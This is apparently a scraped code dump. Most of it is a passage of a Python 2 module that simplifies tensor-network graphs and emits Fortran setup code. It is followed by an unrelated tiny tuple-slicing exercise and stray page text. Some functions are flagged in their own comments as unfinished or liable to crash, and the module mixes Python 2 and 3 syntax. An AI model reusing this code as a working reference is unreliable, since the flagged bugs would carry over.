            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "Wp_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (partner, 4), (partner, 5), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2), (node, 3), (node, 4)],
            ident: [(partner, 1), (node, 5)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_W1(g):
    """Cancel every W1_<tag>/W1p_<tag> pair whose first two W1 legs land
    on W1p legs 2-3: the pair contracts to an identity, replaced (via
    Add_Graph) by a temporary I node joining W1p leg 1 to W1 leg 3 that
    Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "W1":
            continue
        partner = "W1p_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        if (n1, e1, n2, e2) == (partner, 2, partner, 3):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "W1p_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2)],
            ident: [(partner, 1), (node, 3)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_W2(g):
    """Cancel every W2_<tag>/W2p_<tag> pair whose first two W2 legs land
    on W2p legs 2-3: the pair contracts to an identity, replaced (via
    Add_Graph) by a temporary I node joining W2p leg 1 to W2 leg 3 that
    Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "W2":
            continue
        partner = "W2p_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        if (n1, e1, n2, e2) == (partner, 2, partner, 3):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "W2p_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2)],
            ident: [(partner, 1), (node, 3)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_W(g):
    """Cancel every W_<tag>/Wp_<tag> pair whose first two W legs land on
    Wp legs 2-3: the pair contracts to an identity, replaced (via
    Add_Graph) by a temporary I node joining Wp leg 1 to W leg 3 that
    Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "W":
            continue
        partner = "Wp_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        if (n1, e1, n2, e2) == (partner, 2, partner, 3):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "Wp_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2)],
            ident: [(partner, 1), (node, 3)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_U(g):
    """Cancel every U_<tag>/Up_<tag> pair whose first two U legs land on
    Up legs 3-4: the pair contracts to a pair of identities, so it is
    replaced (via Add_Graph) by two temporary I nodes joining Up legs
    1-2 to U legs 3-4, which Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "U":
            continue
        partner = "Up_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        if (n1, e1, n2, e2) == (partner, 3, partner, 4):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "Up_" + tag
        ident1 = "I1_" + tag
        ident2 = "I2_" + tag
        patch = {
            node: [(partner, 3), (partner, 4), (ident1, 2), (ident2, 2)],
            partner: [(ident1, 1), (ident2, 1), (node, 1), (node, 2)],
            ident1: [(partner, 1), (node, 3)],
            ident2: [(partner, 2), (node, 4)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def Simplify_Graph_V(g):
    """Cancel every V_<tag>/Vp_<tag> pair whose first two V legs land on
    Vp legs 2-3: the pair contracts to an identity, replaced (via
    Add_Graph) by a temporary I node joining Vp leg 1 to V leg 3 that
    Simplify_Graph_I then removes."""
    ng = g
    hits = []
    for node in ng.keys():
        kind, tag = node.split("_", 1)
        if kind != "V":
            continue
        partner = "Vp_" + tag
        n1, e1 = ng[node][0]
        n2, e2 = ng[node][1]
        if (n1, e1, n2, e2) == (partner, 2, partner, 3):
            hits.append(node)
    for node in hits:
        tag = node.split("_", 1)[1]
        partner = "Vp_" + tag
        ident = "I_" + tag
        patch = {
            node: [(partner, 2), (partner, 3), (ident, 2)],
            partner: [(ident, 1), (node, 1), (node, 2)],
            ident: [(partner, 1), (node, 3)],
        }
        ng = Simplify_Graph_I(Add_Graph(patch, ng))
    return ng
def print_graph(g, prefix=""):
    """Print graph g one node per line, sorted by key, each line
    prefixed with `prefix` (e.g. "!!$ " for Fortran comments).

    Fix: py2-only ``keys = g.keys(); keys.sort()`` and the print
    statement replaced by ``sorted`` and a single-string print() --
    output is byte-identical on both Python versions.
    """
    for k in sorted(g.keys()):
        print('%s %s %s' % (prefix, k, g[k]))
def Simplify_Graph_I(g):
    """Remove identity nodes (keys starting with "I") by wiring each of
    their two legs straight through to the opposite side; all other
    nodes are copied with their links rewired accordingly."""
    identities = set(k for k in g.keys() if k[0] == "I")
    simplified = {}
    for node in g.keys():
        if node in identities:
            continue
        rewired = []
        for link in g[node]:
            if link[0] in identities:
                # Follow through the identity: leg 1 exits on leg 2 and
                # any other leg exits on leg 1 (matches the original
                # e = v[1]-1; 0 -> 1 else 0 mapping).
                opposite = 1 if link[1] == 1 else 0
                rewired.append(g[link[0]][opposite])
            else:
                rewired.append(link)
        simplified[node] = rewired
    return simplified
def Break_Graph(g):
    """Split graph g into its connected components.

    Returns a list of sub-dicts, one per component, each mapping its
    member nodes to their original entries in g.  Component order is
    unspecified (it depends on set iteration order, as before).
    """
    unvisited = set(g.keys())
    components = []
    while unvisited:
        # Flood-fill one component starting from an arbitrary node.
        frontier = set([unvisited.pop()])
        members = set()
        while frontier:
            node = frontier.pop()
            members.add(node)
            for link in g[node]:
                neighbor = link[0]
                if neighbor not in members:
                    frontier.add(neighbor)
                    unvisited.discard(neighbor)
        components.append(dict((k, g[k]) for k in members))
    return components
# for kc in key_class:
# print kc
# print
# for v in g[k]:
# kc.add(v[0])
# keys.discard(v[0])
def ChangeNodeName(g):
    """Apparently intended to rename references to a 6-leg combined
    'OO' node.

    WARNING(review): the body is unfinished -- it assigns ``nv = ""``
    and then falls off the end, so the function always returns None and
    the partially built ``ng``/``nvs`` are discarded.  Python 2 only
    (``has_key``).  Left untouched pending clarification of intent.
    """
    ng = {}
    if g.has_key('OO') and len(g['OO']) == 6:
        for k in g.keys():
            nvs = []
            for v in g[k]:
                if v[0] == "OO":
                    nv = ""
def add_graph(gx1, gx2):
    """Join two integer-keyed graphs into one.

    gx2's node ids are shifted by +100 so the two key ranges cannot
    collide.  The largest node of gx1 (k1_link) and the second-largest
    shifted node of gx2 (k3_link) act as splice points: both are
    dropped, and every leg that pointed at one of them is rewired to the
    corresponding slot of the other, following the original slot index.

    Returns the merged graph; gx1 and gx2 are left untouched.

    Fix: py2-only ``.keys()`` followed by ``.sort()`` replaced with
    ``sorted(...)`` (identical ordering, works on py2 and py3).
    """
    k1s = sorted(gx1.keys())
    # Shifted copy of gx2 with all node references offset by 100.
    gx3 = {}
    for k2 in sorted(gx2.keys()):
        gx3[k2 + 100] = [(v[0] + 100, v[1]) for v in gx2[k2]]
    k3s = sorted(gx3.keys())
    k1_link = k1s[-1]   # splice node on the gx1 side
    k3_link = k3s[-2]   # splice node on the (shifted) gx2 side
    gx4 = {}
    for k1 in k1s:
        if k1 == k1_link:
            continue
        gx4[k1] = []
        for n, e in gx1[k1]:
            if n != k1_link:
                gx4[k1].append((n, e))
            else:
                # Follow through the dropped splice node into gx2's side.
                nn, ee = gx3[k3_link][e - 1]
                gx4[k1].append((nn, ee))
    for k3 in k3s:
        if k3 == k3_link:
            continue
        gx4[k3] = []
        for n, e in gx3[k3]:
            if n != k3_link:
                gx4[k3].append((n, e))
            else:
                nn, ee = gx1[k1_link][e - 1]
                gx4[k3].append((nn, ee))
    return gx4
def get_path_cost(gx, pr=False):
    """Search for the cheapest contraction order of the network gx.

    Builds the edge-numbered form of gx (GC2GE), derives node adjacency
    (gnode), then enumerates candidate orderings between every pair of
    nodes with find_all_path_pool and scores each with contract_gmera.

    Returns (max_leg, max_comp, path, max_cost): leg count,
    intermediate size, node ordering and total cost of the best
    ordering found.  Python 2 only (xrange, print statements,
    list.sort on dict keys).

    NOTE(review): if no candidate ordering is ever found, `path` is
    never bound and the final return raises UnboundLocalError --
    presumably the inputs always admit at least one ordering.  Also
    verify that contract_gmera's failure branch returns three values; a
    2-tuple there would raise at the unpack below before `leg < 0` is
    tested.
    """
    ge,gm=GC2GE(gx)
    graph = gnode(gm)
    ks = graph.keys()
    ks.sort()
    for k in ks:
        graph[k].sort()
    # Sentinel "worst" scores; any real ordering beats them.
    max_leg = 1000; max_comp = 10000
    max_cost = 1e200
    for i in xrange(0,len(ks)):
        for j in xrange(i+1, len(ks)):
            start = ks[i]; end = ks[j]
            paths=find_all_path_pool(graph,start,end)
            for p in paths:
                leg,comp,cost=contract_gmera(gm, p)#, True)
                if leg < 0:
                    print 'error contracting'
                    sys.exit(-1)
                if (cost < max_cost):
                    # Strictly cheaper ordering: adopt it outright.
                    max_leg = leg
                    max_comp = comp
                    path = p
                    max_cost = cost
                    if pr: print leg, comp, p, cost
                if (cost == max_cost):
                    # Tie on cost: prefer the ordering with smaller legs.
                    # (Also re-entered right after the branch above,
                    # where max_cost was just set to cost -- harmless.)
                    if (leg < max_leg):
                        max_leg = leg
                        path = p
                        if pr: print leg, comp, p, cost
#                Earlier tie-breaking scheme kept for reference:
#                if (comp == max_comp):
#                    if (leg < max_leg):
#                        max_leg = leg
#                        path = p
#                elif (comp < max_comp):
#                    max_leg = leg
#                    max_comp = comp
#                    path = p
#                if (leg<=max_leg and comp<=max_comp):
#                    if pr: print leg, comp, p, cost
    return max_leg, max_comp, path, max_cost
def Output_Fortran(ii, Gname, Oname, gg, jj=-1):
    """Emit Fortran source initialising graph structure array `Gname`
    (and contraction-order array `Oname`) at index ii -- or (ii,jj)
    when jj >= 0 -- from the network gg.

    Prints the node table, per-node edge lists and the cheapest
    contraction order found by get_path_cost as Fortran assignments;
    ``%%`` in the format strings yields the literal ``%`` of Fortran's
    derived-type component syntax.  Python 2 only (print statements).
    """
    ge,gm = GC2GE(gg)
    # Assign each node a 1-based Fortran index in gm's key order.
    gm_nodes = {}
    j = 0
    ks = gm.keys()
    for k in ks:
        j += 1
        name=k.split("_",1)[0]
        gm_nodes[k] = j
    # Translate the best contraction path into Fortran node indices.
    order = []
    leg,comp, path, cost=get_path_cost(gg)#,pr=True)
    for k in path:
        order.append(gm_nodes[k])
    # Echo the graph itself as Fortran comment lines ("!!$ ...").
    print_graph(gg, "!!$ ")
    if jj < 0:
        print " %s(%d)%%nNode=%d" % (Gname, ii,len(ks))
        print " %s(%d)%%Nodes=-1" % (Gname, ii)
        print " %s(%d)%%Edges=-1" % (Gname, ii)
    else:
        print " %s(%d,%d)%%nNode=%d" % (Gname, ii,jj,len(ks))
        print " %s(%d,%d)%%Nodes=-1" % (Gname, ii,jj)
        print " %s(%d,%d)%%Edges=-1" % (Gname, ii,jj)
    j = 0
    for k in ks:
        j=j+1
        name=k.split("_",1)[0]
        edges = ",".join([str(x) for x in gm[k]])
        leng = len(gm[k])
        # Combined nodes are renamed by leg count for the Fortran side:
        # 6-leg OO -> OOO, 2-leg OO -> O, 6-leg oo -> ooo.
        if (name == "OO" and leng == 6): name = "OOO"
        if (name == "OO" and leng == 2): name = "O"
        if (name == "oo" and leng == 6): name = "ooo"
        if jj < 0:
            print ''' %s(%d)%%Names(%d)="%s" !%s''' % (Gname, ii,j, name, k)
            print " %s(%d)%%Nodes(%d)=%d" % (Gname, ii,j,leng)
            print " %s(%d)%%Edges(1:%d,%d)=(/%s/)" % (Gname, ii,leng,j,edges)
        else:
            print ''' %s(%d,%d)%%Names(%d)="%s" !%s''' % (Gname, ii,jj,j, name, k)
            print " %s(%d,%d)%%Nodes(%d)=%d" % (Gname, ii,jj,j,leng)
            print " %s(%d,%d)%%Edges(1:%d,%d)=(/%s/)" % (Gname, ii,jj,leng,j,edges)
    # Record the score of the chosen order as a Fortran comment.
    print "!$$ %d/%d %20.14G" % (leg,comp, cost)
    if jj<0:
        print " %s(1:%d, %d)=(/%s/)" % (Oname, len(ks), ii,
                ",".join([str(x) for x in order]))
    else:
        print " %s(1:%d, %d,%d)=(/%s/)" % (Oname, len(ks), ii, jj,
                ",".join([str(x) for x in order]))
    print
oo1_tmpl = """{
"oo_%(1)s":[("I_%(1)s",1), ("I_%(1)s", 2)],
"I_%(1)s":[("oo_%(1)s", 1), ("oo_%(1)s", 2)]
}"""
oo2_tmpl = """{
"oo_%(1)s_%(2)s":[("I_%(1)s",1), ("I_%(2)s", 1), ("I_%(1)s", 2), ("I_%(2)s", 2)],
"I_%(1)s":[("oo_%(1)s_%(2)s", 1), ("oo_%(1)s_%(2)s", 3)],
"I_%(2)s":[("oo_%(1)s_%(2)s", 2), ("oo_%(1)s_%(2)s", 4)]
}
"""
oo2_Ntmpl = """{
"%(name)s_%(1)s_%(2)s":[("I_%(1)s",1), ("I_%(2)s", 1), ("I_%(1)s", 2), ("I_%(2)s", 2)],
"I_%(1)s":[("%(name)s_%(1)s_%(2)s", 1), ("%(name)s_%(1)s_%(2)s", 3)],
"I_%(2)s":[("%(name)s_%(1)s_%(2)s", 2), ("%(name)s_%(1)s_%(2)s", 4)]
}
"""
oo3_tmpl = """{
"oo_%(1)s_%(2)s_%(3)s":[("I_%(1)s",1), ("I_%(2)s",1), ("I_%(3)s",1),
("I_%(1)s",2), ("I_%(2)s",2), ("I_%(3)s",2)],
"I_%(1)s":[("oo_%(1)s_%(2)s_%(3)s",1), ("oo_%(1)s_%(2)s_%(3)s",4)],
"I_%(2)s":[("oo_%(1)s_%(2)s_%(3)s",2), ("oo_%(1)s_%(2)s_%(3)s",5)],
"I_%(3)s":[("oo_%(1)s_%(2)s_%(3)s",3), ("oo_%(1)s_%(2)s_%(3)s",6)]
}
"""
|
def oddTuples(aTup):
    '''
    aTup: a tuple
    returns: tuple, every other element of aTup.
    '''
    # Slicing with step 2 keeps elements at even indices (0, 2, 4, ...),
    # which is exactly "every other element" starting from the first.
    # Replaces the original index loop with its leftover debug prints
    # and O(n^2) tuple concatenation; the return value is unchanged.
    return aTup[::2]

print(oddTuples((4, 15, 4, 5, 2, 15, 7, 20)))
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.